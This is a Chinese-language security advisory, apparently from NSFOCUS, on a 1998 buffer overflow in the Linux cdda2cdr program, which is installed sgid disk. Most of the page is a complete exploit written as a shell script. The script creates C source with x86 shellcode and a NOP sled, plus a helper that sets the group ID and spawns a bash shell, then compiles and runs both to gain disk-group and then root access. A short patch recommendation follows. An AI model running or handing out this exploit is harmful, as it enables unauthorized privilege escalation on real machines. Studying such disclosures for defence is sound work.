首页 -> 安全研究
安全研究
安全漏洞
cdda2cdr缓冲区溢出漏洞
发布日期:1998-10-01
更新日期:1998-10-01
受影响系统:
Linux描述:
在cddda2cdr(发行包版本为cdwtools-0.93-78)中存在一个缓冲区溢出漏洞。该程序缺省时设置了sgid disk位,恶意用户可以利用它获得对/dev/hd*下所有硬盘的读/写权限。这显然是一种简单快速的本地越权(root)访问。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#
# Shell script for Linux x86 cdda2cdr exploit
# Brock Tellier btellier@usa.net
#
cat > /tmp/cdda2x.c <<EOF
/**
** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros)
** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz>
**
** Brock Tellier btellier@usa.net
**/
#include <stdlib.h>
#include <stdio.h>
char exec[]= /* Generic Linux x86 running our /tmp program */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/cd";
#define LEN 500
#define NOP 0x90
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char *argv[]) {
int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];
if(argc > 3) {
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
exit(0);
}
else if (argc == 2){
offset=atoi(argv[1]);
}
else if (argc == 3) {
offset=atoi(argv[1]);
buflen=atoi(argv[2]);
}
else {
offset=500;
buflen=500;
}
addr=get_sp();
fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
*(int *)&buf[i]=addr+offset;
execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);
/*
for (i=0; i < strlen(buf); i++) putchar(buf[i]);
*/
}
EOF
cat > /tmp/cd.c <<EOF
void main() {
setregid(getegid(), getegid());
system("/bin/bash");
}
EOF
gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x
建议:
从各供应商处获取并安装含有补丁程序的软件包。
注:此溢出漏洞对cdda2wav程序并无影响。
浏览次数:22060
严重程度:0(网友投票)
绿盟科技给您安全的保障